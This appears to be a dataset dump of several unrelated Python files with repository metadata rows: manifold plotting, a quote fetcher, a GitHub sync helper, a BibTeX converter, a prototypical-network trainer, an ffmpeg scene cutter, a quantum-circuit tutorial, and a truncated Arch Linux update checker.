sz = 12
sample_sz = 18
opac = 1
slice_width = 0.03
samples = samples[(samples[:, 2] >= -slice_width) &
(samples[:, 2] <= slice_width), :]
training_data = training_data[
(training_data[:, 2] >= -slice_width) &
(training_data[:, 2] <= slice_width), :]
plot_data = [
go.Scatter(x=samples[:, 0],
y=samples[:, 1],
name="Samples",
mode='markers',
marker=dict(size=sample_sz, opacity=opac)),
go.Scatter(x=training_data[:, 0],
y=training_data[:, 1],
name="Training data",
mode='markers',
marker=dict(size=sz, opacity=opac / 2))
]
title = "Visualization of the slice near z=0 of the ECoMaNN manifold for 3dof"
else:
sz = 2
sample_sz = 5
plot_data = [
go.Scatter3d(x=samples[:, 0],
y=samples[:, 1],
z=samples[:, 2],
name="Samples",
mode='markers',
marker=dict(size=sample_sz, opacity=opac)),
go.Scatter3d(x=training_data[:, 0],
y=training_data[:, 1],
z=training_data[:, 2],
name="Training data",
mode='markers',
marker=dict(size=sz, opacity=opac))
]
title = "Visualization of the ECoMaNN manifold for 3dof"
fig = go.Figure(data=plot_data)
fig.update_layout(title=title)
# fig.update_layout(height=800, width=1050) # could be useful for slice
fig.show()
full_vae_evaluation_for_dataset(
dataset_name="sphere",
training_data_filepath=
"../data/trajectories/synthetic_unit_sphere_wo_noise.npy",
experiment_trials_foldername='sphere_trials',
do_barplots=do_barplots,
do_save_samples=do_save_samples,
do_save_recon=do_save_recon,
do_plot=do_plot,
do_eval=do_eval,
do_plot_slice=do_plot_slice,
experiment_folder=experiment_folder)
full_vae_evaluation_for_dataset(
dataset_name="circle",
training_data_filepath="../data/trajectories/circle_loop.npy",
experiment_trials_foldername='circle_trials',
do_barplots=do_barplots,
do_save_samples=do_save_samples,
do_save_recon=do_save_recon,
do_plot=do_plot,
do_eval=do_eval,
do_plot_slice=do_plot_slice,
experiment_folder=experiment_folder)
full_vae_evaluation_for_dataset(
dataset_name="3dof",
training_data_filepath="../data/trajectories/3dof_v2_traj.npy",
experiment_trials_foldername='3DOF_trials',
do_barplots=do_barplots,
do_save_samples=do_save_samples,
do_save_recon=do_save_recon,
do_plot=do_plot,
do_eval=do_eval,
do_plot_slice=do_plot_slice,
experiment_folder=experiment_folder)
full_vae_evaluation_for_dataset(
dataset_name="6dof",
training_data_filepath="../data/trajectories/6dof_traj.npy",
experiment_trials_foldername='6DOF_trials',
do_barplots=do_barplots,
do_save_samples=do_save_samples,
do_save_recon=do_save_recon,
do_plot=do_plot,
do_eval=do_eval,
do_plot_slice=do_plot_slice,
experiment_folder=experiment_folder,
plot_4d=True)
if do_barplots:
plt.show()
print("Done.")
| 39.949593 | 148 | 0.53421 | 2,824 | 24,569 | 4.42068 | 0.144476 | 0.033643 | 0.012816 | 0.017943 | 0.418536 | 0.356456 | 0.297741 | 0.263377 | 0.256328 | 0.248798 | 0 | 0.014024 | 0.373112 | 24,569 | 614 | 149 | 40.014658 | 0.79652 | 0.124303 | 0 | 0.36961 | 0 | 0.00616 | 0.096437 | 0.0169 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032854 | false | 0 | 0.020534 | 0.00616 | 0.090349 | 0.036961 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2fd8380ddf10eda9c6d44420cfcef69f1e223b3 | 1,062 | py | Python | app/request.py | lorderonnie/ronniesblog | 11bb3ebf96e49a52c5fbc36f098e262e03334872 | [
"MIT"
] | null | null | null | app/request.py | lorderonnie/ronniesblog | 11bb3ebf96e49a52c5fbc36f098e262e03334872 | [
"MIT"
] | null | null | null | app/request.py | lorderonnie/ronniesblog | 11bb3ebf96e49a52c5fbc36f098e262e03334872 | [
"MIT"
] | null | null | null | import urllib.request,json
from .models import Quote
get_quote_url='http://quotes.stormconsultancy.co.uk/random.json'
def get_quote():
'''
This gets thejson respond and allows you to access the url information
'''
with urllib.request.urlopen(get_quote_url) as url:
get_quote_data = url.read()
get_quote_response = json.loads(get_quote_data)
quote_results = None
if get_quote_response:
quote_results_list = get_quote_response
quote_results = process_results(quote_results_list)
return quote_results
def process_results(quote_list):
'''
This function will process the results and return them as objects
'''
quote_results=[]
id = quote_list.get('id')
author = quote_list.get('author')
quote = quote_list.get('quote')
if quote:
quote_object = Quote(id,author,quote)
quote_results.append(quote_object)
return quote_results
| 22.125 | 74 | 0.619586 | 127 | 1,062 | 4.92126 | 0.377953 | 0.1152 | 0.0768 | 0.0672 | 0.0896 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.304143 | 1,062 | 48 | 75 | 22.125 | 0.845737 | 0.12806 | 0 | 0.095238 | 0 | 0 | 0.06808 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.095238 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39018e67f03e1e9f61e5f82b904d4555c3dc4529 | 3,537 | py | Python | github_sync.py | polifonia-project/polifonia_dashboard | 7a2ad585eb5adc3726ff8c6585cc7d1061507e77 | [
"0BSD"
] | null | null | null | github_sync.py | polifonia-project/polifonia_dashboard | 7a2ad585eb5adc3726ff8c6585cc7d1061507e77 | [
"0BSD"
] | 2 | 2022-03-09T21:43:19.000Z | 2022-03-15T18:13:51.000Z | github_sync.py | polifonia-project/polifonia_dashboard | 7a2ad585eb5adc3726ff8c6585cc7d1061507e77 | [
"0BSD"
] | null | null | null | import os, json
import requests
from github import Github, InputGitAuthor
import conf
dir_path = os.path.dirname(os.path.realpath(__file__))
# OAUTH APP
clientId = conf.clientID
clientSecret = conf.clientSecret
def ask_user_permission(code):
""" get user permission when authenticating via github"""
res = None
body = {
"client_id" : clientId,
"client_secret" : clientSecret,
"code" : code
}
req = requests.post('https://github.com/login/oauth/access_token', data=body,
headers={"accept": "application/json"})
print('token exchange status:', req.status_code)  # avoid logging the client secret
if req.status_code == 200:
res = req.json()
return res
def get_user_login(res):
""" get github user information """
userlogin, usermail = None, None
print("user requesting github login:", res)
access_token = res["access_token"]
req_user = requests.get("https://api.github.com/user",
headers={"Authorization": "token "+access_token})
if req_user.status_code == 200:
res_user = req_user.json()
userlogin = res_user["login"]
usermail = res_user["email"]
return userlogin, usermail, access_token
def get_github_users(userlogin):
""" match user with collaborators of github repository"""
is_valid_user = False
if conf.token != '' and conf.owner != '' and conf.repo_name != '':
req = requests.get("https://api.github.com/repos/"+conf.owner+"/"+conf.repo_name+"/collaborators",
headers={"Authorization": "token "+conf.token})
if req.status_code == 200:
users = [user['login'] for user in req.json()]
if userlogin in users:
is_valid_user = True
return is_valid_user
def push(local_file_path, branch='main', gituser=None, email=None, bearer_token=None, action=''):
""" create a new file or update an existing file.
the remote file has the same relative path of the local one"""
token = conf.token if bearer_token is None else bearer_token
user = conf.author if gituser is None else gituser
usermail = conf.author_email if email is None else email
owner = conf.owner
repo_name = conf.repo_name
g = Github(token)
repo = g.get_repo(owner+"/"+repo_name)
author = InputGitAuthor(user,usermail) # commit author
try:
contents = repo.get_contents(local_file_path) # Retrieve the online file to get its SHA and path
update=True
message = "updated file "+local_file_path+' '+action
except:
update=False
message = "created file "+local_file_path
with open(local_file_path) as f: # Both create/update file replace the file with the local one
data = f.read() # could be done in a smarter way
if update == True: # If file already exists, update it
repo.update_file(contents.path, message, data, contents.sha, author=author) # Add, commit and push branch
else:
try:
# If file doesn't exist, create it in the same relative path of the local file
repo.create_file(local_file_path, message, data, branch=branch, author=author) # Add, commit and push branch
except Exception as e:
print(e)
def delete_file(local_file_path, branch, gituser=None, email=None, bearer_token=None):
""" delete files form github """
token = conf.token if bearer_token is None else bearer_token
user = conf.author if gituser is None else gituser
usermail = conf.author_email if email is None else email
owner = conf.owner
repo_name = conf.repo_name
g = Github(token)
repo = g.get_repo(owner+"/"+repo_name)
author = InputGitAuthor(user,usermail) # commit author
contents = repo.get_contents(local_file_path)
message = "deleted file "+local_file_path
repo.delete_file(contents.path, message, contents.sha, branch=branch)
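# --- Illustrative usage sketch (not part of the original module) ---
# The intended OAuth + push flow, assuming `code` came back from GitHub's
# authorize redirect and conf.* is filled in; the file path is hypothetical.
#
# res = ask_user_permission(code)
# if res is not None:
#     login, mail, token = get_user_login(res)
#     if get_github_users(login):
#         push('data/records.json', branch='main', gituser=login,
#              email=mail, bearer_token=token, action='via dashboard')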
| 33.685714 | 112 | 0.729714 | 528 | 3,537 | 4.746212 | 0.248106 | 0.035914 | 0.046688 | 0.033919 | 0.34158 | 0.327215 | 0.304868 | 0.197925 | 0.197925 | 0.197925 | 0 | 0.003022 | 0.158044 | 3,537 | 104 | 113 | 34.009615 | 0.838482 | 0.171897 | 0 | 0.282051 | 0 | 0 | 0.104571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064103 | false | 0 | 0.051282 | 0 | 0.153846 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3901f5052217f31c1711d03d87f6b9db3214ccf0 | 1,928 | py | Python | pubs_converter/converter.py | IntelAgir-Research-Group/intelagir-research-group.github.io | 5ab3572c1ac08b4819b2a0df26516d6127ce0a35 | [
"MIT"
] | null | null | null | pubs_converter/converter.py | IntelAgir-Research-Group/intelagir-research-group.github.io | 5ab3572c1ac08b4819b2a0df26516d6127ce0a35 | [
"MIT"
] | null | null | null | pubs_converter/converter.py | IntelAgir-Research-Group/intelagir-research-group.github.io | 5ab3572c1ac08b4819b2a0df26516d6127ce0a35 | [
"MIT"
] | 2 | 2021-02-08T16:23:33.000Z | 2022-01-05T20:19:44.000Z | # install package before running:
# pip install bibtexparser
import bibtexparser
with open('publications.bib') as bibtex_file:
# bib_database = bibtexparser.load(bibtex_file)
bib_database = bibtexparser.bparser.BibTexParser(common_strings=True).parse_file(bibtex_file)
md_string = ""
for entry in bib_database.entries:
bib_type = entry["ENTRYTYPE"]
if bib_type == "article":
venue = entry["journal"]
md_type = "article"
elif bib_type == "inproceedings":
venue = entry["booktitle"]
md_type = "conference"
elif bib_type == "inbook":
venue = entry["title"]
md_type = "book"
elif bib_type == "phdthesis":
venue = entry["organization"]
md_type = "thesis"
elif bib_type == "misc":
venue = ""
md_type = "other"
elif bib_type == "book":
venue = entry["publisher"]
md_type = "book"
else:
    # unknown entry type: keep venue/md_type defined to avoid a NameError below
    print("unknown entry type:", bib_type)
    venue = ""
    md_type = "other"
md_string += " - title: "
md_string += "\"" + entry["title"] + "\"\n"
md_string += " authors: "
md_string += entry["author"] + "\n"
md_string += " type: "
md_string += md_type + "\n"
md_string += " venue: "
md_string += "\"" + venue + "\"\n"
md_string += " doi: "
doi = entry["doi"] if "doi" in entry else ""
md_string += doi + "\n"
md_string += " url: "
url = entry["url"] if "url" in entry else ""
md_string += url + "\n"
md_string += " year: "
md_string += entry["year"] + "\n"
# break
# print(md_string)
with open('output-raw.md', "w") as out:
out.write(md_string)
# - title: "Online Experiment-Driven Learning and Adaptation"
# authors: Ilias Gerostathopoulos, Alexander Auf der Strasse
# venue: "Model-Based Engineering of Collaborative Embedded Systems, Springer"
# doi: https://doi.org/10.1007/978-3-030-62136-0_15
# pdf: 2021-CrestBook-IG-chapter.pdf
# year: 2021
# type: bookChapters | 31.606557 | 97 | 0.604772 | 238 | 1,928 | 4.726891 | 0.403361 | 0.120889 | 0.048 | 0.037333 | 0.092444 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019931 | 0.245332 | 1,928 | 61 | 98 | 31.606557 | 0.753265 | 0.226141 | 0 | 0.045455 | 0 | 0 | 0.199324 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022727 | 0 | 0.022727 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39029f6c2c31cf4b23816a7a341ec805e7421baa | 698 | py | Python | [OPMan]/Seasonals [TV]/2011-4 - Fall/[a8292] Ben-To/setup.py | LightArrowsEXE/Encoding-Projects | 4ea96a5b25a7710f615ada5ff25949c496492b53 | [
"MIT"
] | 57 | 2019-01-31T17:32:46.000Z | 2022-03-23T05:46:51.000Z | [OPMan]/Seasonals [TV]/2011-4 - Fall/[a8292] Ben-To/setup.py | LightArrowsEXE/Encoding-Projects | 4ea96a5b25a7710f615ada5ff25949c496492b53 | [
"MIT"
] | null | null | null | [OPMan]/Seasonals [TV]/2011-4 - Fall/[a8292] Ben-To/setup.py | LightArrowsEXE/Encoding-Projects | 4ea96a5b25a7710f615ada5ff25949c496492b53 | [
"MIT"
] | 12 | 2019-04-30T06:16:13.000Z | 2022-03-14T16:15:07.000Z | #!/usr/bin/env python3
import setuptools
with open("requirements.txt") as fh:
install_requires = fh.read()
name = "bento_filters"
version = "1.0.0"
release = "1.0.0"
setuptools.setup(
name=name,
version=release,
author="LightArrowsEXE",
author_email="Lightarrowsreboot@gmail.com",
description="Filtering functions for [◯PMan] Ben-To!",
packages=["bento_filters"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_data={
'bento_filters': ['py.typed'],  # must match the package name above
},
install_requires=install_requires,
python_requires='>=3.9',
)
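
# Editorial note (not in the original file): `version = "1.0.0"` above is
# unused -- setup() is passed `release`. With requirements.txt alongside,
# installing locally would be e.g. `pip install .` (assumed usage).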
| 23.266667 | 58 | 0.640401 | 79 | 698 | 5.556962 | 0.721519 | 0.102506 | 0.013667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018116 | 0.209169 | 698 | 29 | 59 | 24.068966 | 0.775362 | 0.030086 | 0 | 0 | 0 | 0 | 0.390533 | 0.039941 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39030dc4ca3d919715e730ef09db812f228c6f4a | 5,256 | py | Python | nips17_proto/proto.py | hli2020/proto_net | e95ee26a2d68ecdb6ddd701b5ef4029202e33742 | [
"MIT"
] | 2 | 2019-07-06T08:04:51.000Z | 2019-10-18T12:27:16.000Z | nips17_proto/proto.py | hli2020/proto_net | e95ee26a2d68ecdb6ddd701b5ef4029202e33742 | [
"MIT"
] | null | null | null | nips17_proto/proto.py | hli2020/proto_net | e95ee26a2d68ecdb6ddd701b5ef4029202e33742 | [
"MIT"
] | 1 | 2021-01-26T02:56:46.000Z | 2021-01-26T02:56:46.000Z | # coding=utf-8
from tqdm import tqdm
import sys
import os  # os, numpy and torch are otherwise only implicit via basic_opt's star import
import argparse
import numpy as np
import torch
from torch import optim
from basic_opt import *
from prototypical_loss import prototypical_loss as loss_fn
from protonet import ProtoNet
sys.path.append(os.getcwd())
from dataset.data_loader import data_loader
from torch.optim.lr_scheduler import MultiStepLR, StepLR
def get_parser():
    parser = argparse.ArgumentParser()
    parser.add_argument('-dataset', type=str, default='omniglot')  # mini-imagenet
    # used in data_loader.py for omniglot
    parser.add_argument('-classes_per_it_tr', type=int, default=60)  # just the N-way
    parser.add_argument('-classes_per_it_val', type=int, default=5)
    # used in 'init_sampler' method
    parser.add_argument('-k_shot', type=int, default=5)  # old name: num_support_tr
    parser.add_argument('-k_query', type=int, default=5)  # old name: num_query_tr
    parser.add_argument('-num_support_val', type=int, default=5)  # just the k_shot for validation
    parser.add_argument('-num_query_val', type=int, default=15)  # just the k_query for validation
    parser.add_argument('-gpu_id', type=int, nargs='+', default=0)
    parser.add_argument('-distance', type=str, help='cosine or euclidean', default='euclidean')
    return parser
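
# Editorial sketch (assumed invocation, not from the repo docs): with the
# defaults above this trains 60-way, 5-shot omniglot, e.g.
#   python nips17_proto/proto.py -dataset omniglot -k_shot 5 -distance euclidean
# plus whatever options get_basic_parser() adds (lr, nep, device, ...).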
# PARAMS
opts = get_basic_parser(get_parser()).parse_args()
opts.method = 'proto'
setup(opts)

# CREATE MODEL
net = ProtoNet().to(opts.device)

# RESUME (fixme with appropriate epoch and iter)
if os.path.exists(opts.model_file):
    print_log('loading previous best checkpoint [{}] ...'.format(opts.model_file), opts.log_file)
    net.load_state_dict(torch.load(opts.model_file))
if opts.multi_gpu:
    print_log('Wrapping network into multi-gpu mode ...', opts.log_file)
    net = torch.nn.DataParallel(net)

# PREPARE DATA
train_db, val_db, test_db, _ = data_loader(opts)

# MISC
# TODO: original repo don't have weight decay
optimizer = optim.Adam(net.parameters(), lr=opts.lr, weight_decay=opts.weight_decay)
# scheduler = MultiStepLR(optimizer, milestones=opts.scheduler, gamma=opts.lr_scheduler_gamma)
scheduler = StepLR(optimizer, gamma=opts.lr_scheduler_gamma, step_size=opts.lr_scheduler_step)

# PIPELINE
if val_db is None:
    best_state = None
train_loss, train_acc, val_loss, val_acc, best_acc = [], [], [], [], 0

for epoch in range(opts.nep):
    old_lr = optimizer.param_groups[0]['lr']
    scheduler.step()
    new_lr = optimizer.param_groups[0]['lr']
    if epoch == 0:
        print_log('\tInitial lr is {:.8f}\n'.format(old_lr), opts.log_file)
    if new_lr != old_lr:
        print_log('\tLR changes from {:.8f} to {:.8f} at epoch {:d}\n'.format(old_lr, new_lr, epoch), opts.log_file)

    tr_iter = iter(train_db)
    for batch in tqdm(tr_iter):
        net.train()
        x, y = batch[0].to(opts.device), batch[1].to(opts.device)
        # TODO use k_query or not?
        loss, acc = loss_fn(net(x), target=y, n_support=opts.k_shot,
                            distance=opts.distance, device=opts.device)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        train_loss.append(loss.item())
        train_acc.append(acc.item())

    # ONE EPOCH ENDS
    avg_loss = np.mean(train_loss[-opts.iterations:])  # TODO: why need iterations?
    avg_acc = np.mean(train_acc[-opts.iterations:])
    print_log('Avg Train Loss: {:.5f}, Avg Train Acc: {:.5f}'.format(avg_loss, avg_acc), opts.log_file)

    if val_db is None:
        continue

    val_iter = iter(val_db)
    net.eval()
    for batch in val_iter:
        x, y = batch[0].to(opts.device), batch[1].to(opts.device)
        loss, acc = loss_fn(net(x), target=y, n_support=opts.num_support_val,
                            distance=opts.distance, device=opts.device)
        val_loss.append(loss.item())
        val_acc.append(acc.item())
    avg_loss = np.mean(val_loss[-opts.iterations:])
    avg_acc = np.mean(val_acc[-opts.iterations:])
    postfix = ' (Best)' if avg_acc >= best_acc else ' (Best: {:.5f})'.format(best_acc)
    print_log('Avg Val Loss: {:.5f}, Avg Val Acc: {:.5f}{}'.format(avg_loss, avg_acc, postfix), opts.log_file)

    if avg_acc >= best_acc:
        best_acc = avg_acc
        if opts.multi_gpu:
            torch.save(net.module.state_dict(), opts.model_file)
        else:
            torch.save(net.state_dict(), opts.model_file)
        print_log('[epoch {} / iter {}] best model saved to: {}'.format(
            epoch, len(train_db), opts.model_file), file=opts.log_file)
        best_acc = avg_acc
        best_state = net.state_dict()

# TRAINING ENDS
if best_state is not None:
    net.load_state_dict(best_state)  # fixme when multi gpu, net.module()
print_log('Testing with best model ...', opts.log_file)
avg_acc = list()
for epoch in range(10):
    test_iter = iter(test_db)
    for batch in test_iter:
        x, y = batch
        x, y = batch[0].to(opts.device), batch[1].to(opts.device)
        _, acc = loss_fn(net(x), target=y, n_support=opts.k_shot,
                         distance=opts.distance, device=opts.device)
        avg_acc.append(acc.item())
avg_acc = np.mean(avg_acc)
print_log('Test Acc: {:.6f}'.format(avg_acc), opts.log_file)
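# Editorial note: the final figure is a plain mean over 10 passes of the
# episodic test loader; papers in this line of work usually also report a 95%
# confidence interval over episodes (mean +/- 1.96 * std / sqrt(n_episodes)).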
| 38.086957 | 116 | 0.660769 | 787 | 5,256 | 4.207116 | 0.23507 | 0.023558 | 0.04621 | 0.018121 | 0.279976 | 0.163697 | 0.120205 | 0.090607 | 0.090607 | 0.090607 | 0 | 0.00742 | 0.205099 | 5,256 | 137 | 117 | 38.364964 | 0.785065 | 0.107496 | 0 | 0.122449 | 0 | 0 | 0.107992 | 0 | 0 | 0 | 0 | 0.007299 | 0 | 1 | 0.010204 | false | 0 | 0.091837 | 0 | 0.112245 | 0.091837 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39047cc2529d32fdf0736bc253ad9e235e31b909 | 2,141 | py | Python | scene_cutter/scene_cutter.py | Zselter07/ffmpeg_scene_cutter | b78237acfe233a1897ef5d12a7745589d21ef0c4 | [
"MIT"
] | null | null | null | scene_cutter/scene_cutter.py | Zselter07/ffmpeg_scene_cutter | b78237acfe233a1897ef5d12a7745589d21ef0c4 | [
"MIT"
] | null | null | null | scene_cutter/scene_cutter.py | Zselter07/ffmpeg_scene_cutter | b78237acfe233a1897ef5d12a7745589d21ef0c4 | [
"MIT"
] | null | null | null | import os
from typing import Optional, List
from kcu import sh, kpath
def create_scenes(
    in_path: str,
    output_folder_path: str,
    threshold: float=0.5,
    min_scene_duration: float=1.5,
    max_scene_duration: float=30,
    debug: bool=False
) -> Optional[List[str]]:
    os.makedirs(output_folder_path, exist_ok=True)
    timestamps_path = os.path.join(output_folder_path, 'timestamps')
    scene_paths = []

    if __create_timestamp_file(in_path, timestamps_path, threshold=threshold, debug=debug):
        timestamps = __get_timestamps_from_file(timestamps_path)

        if timestamps:
            timestamps.insert(0, 0)

            for index, start_ts in enumerate(timestamps[:-1]):
                start_ts += 0.05
                duration = timestamps[index+1] - start_ts -0.05

                if duration < min_scene_duration or duration > max_scene_duration:
                    continue

                scene_path = os.path.join(output_folder_path, str(index) + 'video.mp4')
                __create_scene(in_path, scene_path, start_ts, duration, debug=debug)
                scene_paths.append(scene_path)

            os.remove(timestamps_path)

            return scene_paths

    return None
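
# Editorial usage sketch (hypothetical paths, not from this repo):
#   scenes = create_scenes('input.mp4', 'out_scenes/', threshold=0.4)
# Lowering `threshold` makes the ffmpeg scene filter more sensitive (more,
# shorter cuts); cuts outside [min_scene_duration, max_scene_duration] are skipped.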
# Threshold - the scene change detection score values are between [0-1].
# PRIVATE METHODS
def __create_timestamp_file(in_path: str, out_path: str, threshold: float, debug: bool=False) -> bool:
    sh.sh(
        'ffmpeg -y -i {} -filter:v "select=\'gt(scene,{})\',showinfo" -f null - 2> {}'.format(in_path, threshold, out_path),
        debug=debug
    )

    return os.path.exists(out_path)


def __get_timestamps_from_file(in_path: str) -> Optional[List[float]]:
    with open(in_path, 'r') as file:
        video_data = file.read().replace('\n', '')

    return [float(x.split(' ')[0]) for x in video_data.split('pts_time:')[1:]]


def __create_scene(in_path: str, out_path: str, start_ts: str, duration: str, debug: bool=False) -> bool:
    sh.sh(
        'ffmpeg -y -ss {} -t {} -i {} {} -async 1'.format(start_ts, duration, in_path, out_path),
        debug=debug
    )
return os.path.exists(out_path) | 33.984127 | 124 | 0.643624 | 293 | 2,141 | 4.443686 | 0.320819 | 0.041475 | 0.02765 | 0.029186 | 0.235023 | 0.184332 | 0.155146 | 0.109063 | 0.064516 | 0.064516 | 0 | 0.014042 | 0.234937 | 2,141 | 63 | 125 | 33.984127 | 0.78083 | 0.040168 | 0 | 0.133333 | 0 | 0 | 0.064783 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.066667 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3904fe36e254754cd9d0f734bd1f20cf48a463ed | 1,294 | py | Python | tutorials/source/1.parameterized_quantum_circuit.py | Takishima/mindquantum | e90dfe474b759023d7ae18281b9a87cb8d223d04 | [
"Apache-2.0"
] | null | null | null | tutorials/source/1.parameterized_quantum_circuit.py | Takishima/mindquantum | e90dfe474b759023d7ae18281b9a87cb8d223d04 | [
"Apache-2.0"
] | null | null | null | tutorials/source/1.parameterized_quantum_circuit.py | Takishima/mindquantum | e90dfe474b759023d7ae18281b9a87cb8d223d04 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2022 <Huawei Technologies Co., Ltd>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example of using a parameterized quantum circuit."""
import numpy as np
from mindquantum.core import RX, RY, RZ, Circuit, H, X, Y, Z
print('Gate name:', X)
X.matrix()
print('Gate name:', Y)
Y.matrix()
print('Gate name:', Z)
Z.matrix()
print('Gate name:', H)
H.matrix()
cnot = X.on(0, 1)
print(cnot)
rx = RX('theta')
print('Gate name:', rx)
rx.matrix({'theta': 0})
ry = RY('theta')
print('Gate name:', ry)
ry.matrix({'theta': np.pi / 2})
rz = RZ('theta')
print('Gate name:', rz)
np.round(rz.matrix({'theta': np.pi}))
encoder = Circuit()
encoder += H.on(0)
encoder += X.on(1, 0)
encoder += RY('theta').on(2)
print(encoder)
encoder.summary()
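
# Editorial note (not in the original tutorial): the encoder built above is a
# 3-qubit circuit -- H on q0, X on q1 controlled by q0 (a CNOT), and a
# parameterized RY('theta') on q2 -- so summary() should report one trainable
# parameter, 'theta'.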
| 22.701754 | 76 | 0.673107 | 207 | 1,294 | 4.207729 | 0.468599 | 0.072331 | 0.104478 | 0.065442 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015888 | 0.173107 | 1,294 | 56 | 77 | 23.107143 | 0.798131 | 0.510046 | 0 | 0 | 0 | 0 | 0.170732 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.074074 | 0 | 0.074074 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39057e3e32745631eb166e612031e1b4eb2801c6 | 5,097 | py | Python | .executor/arch-package/t2ec-lib/arch-update.py | gh0zialfat1h/dotfiles | d9b3f93ea6301ec65ed8140b6c6180d7166f3623 | [
"MIT"
] | 3 | 2021-06-02T04:54:09.000Z | 2021-06-06T04:29:01.000Z | .executor/arch-package/t2ec-lib/arch-update.py | 0xft1h/dotfiles | d9b3f93ea6301ec65ed8140b6c6180d7166f3623 | [
"MIT"
] | null | null | null | .executor/arch-package/t2ec-lib/arch-update.py | 0xft1h/dotfiles | d9b3f93ea6301ec65ed8140b6c6180d7166f3623 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
# Author: Piotr Miller
# e-mail: nwg.piotr@gmail.com
# Website: http://nwg.pl
# Project: https://github.com/nwg-piotr/tint2-executors
# License: GPL3
# Credits: RaphaelRochet/arch-update
# https://github.com/RaphaelRochet/arch-update
# Icon by @edskeye
Arguments [-C<aur_helper>] | [-U<terminal>[:aur_helper]] | [menu] | [-O] [-N] | [-M<custom_name>]
[-C<aur_helper>] - check updates, optionally also with the given AUR helper
[-U<terminal>[:aur_helper]] - update in <terminal>, with pacman or the given AUR helper
[-O] - show pending updates as notification
[-N] - name instead of icon
[menu] - show context jgmenu
Dependencies: `pacman-contrib`
Optional: `pacaur` | `trizen` | `yay`, `jgmenu`
"""
import sys
import os
import subprocess
def main():
def main():
    name = None
    helper_name, terminal_name, helper_cmd, updates = "", "", "", ""
    do_check, do_update, do_notify = False, False, False
    tmp_file = os.getenv("HOME") + "/.arch-updates"
    check_command = 'sh -c "checkupdates > ' + tmp_file
    aur_check_commands = {'pacaur': 'pacaur check -q',
                          'trizen': 'trizen -Qqu -a',
                          'yay': 'yay -Qqu -a'}

    if len(sys.argv) > 1:
        for i in range(1, len(sys.argv)):
            if sys.argv[i].upper() == '-O':
                do_check = False
                do_update = False
                do_notify = True
                break
            elif sys.argv[1].upper() == "MENU":
                show_menu()
                break

            if sys.argv[i].upper().startswith('-C'):
                try:
                    helper_cmd = aur_check_commands[sys.argv[i][2::]]
                except KeyError:
                    helper_cmd = ""
                    pass
                if helper_cmd:
